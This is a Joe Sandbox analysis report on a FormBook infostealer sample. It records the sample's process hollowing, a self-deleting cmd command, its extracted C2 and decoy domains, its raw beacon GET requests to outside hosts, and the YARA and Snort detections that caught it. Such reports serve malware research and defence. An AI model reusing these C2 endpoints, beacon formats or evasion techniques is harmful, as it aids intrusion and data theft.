Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GV8EJooYMIgEnEk.exe

Overview

General Information

Sample Name:GV8EJooYMIgEnEk.exe
Analysis ID:562399
MD5:cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1:15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256:9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • GV8EJooYMIgEnEk.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
    • GV8EJooYMIgEnEk.exe (PID: 1012 cmdline: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5924 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6380 cmdline: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 26 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}
          Multi AV Scanner detection for submitted file
          Source: GV8EJooYMIgEnEk.exeVirustotal: Detection: 60%Perma Link
          Source: GV8EJooYMIgEnEk.exeMetadefender: Detection: 20%Perma Link
          Source: GV8EJooYMIgEnEk.exeReversingLabs: Detection: 62%
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.cottoneworld.com/cbgo/Avira URL Cloud: Label: malware
          Source: http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5YlfAvira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: GV8EJooYMIgEnEk.exeJoe Sandbox ML: detected
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: GV8EJooYMIgEnEk.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 4x nop then pop edi3_2_00415681
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi10_2_04AA5681

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 166.88.62.202 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.bitconga.com
          Source: C:\Windows\explorer.exeDomain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.200 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exeDomain query: www.omnipets.store
          Source: C:\Windows\explorer.exeNetwork Connect: 46.252.151.235 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.231.72.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.webarate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.experiencedlawfirms.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.cottoneworld.com/cbgo/
          Source: Joe Sandbox ViewASN Name: ASSUPERNOVAIT ASSUPERNOVAIT
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.243.200 199.59.243.200
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 19:59:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 20:00:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
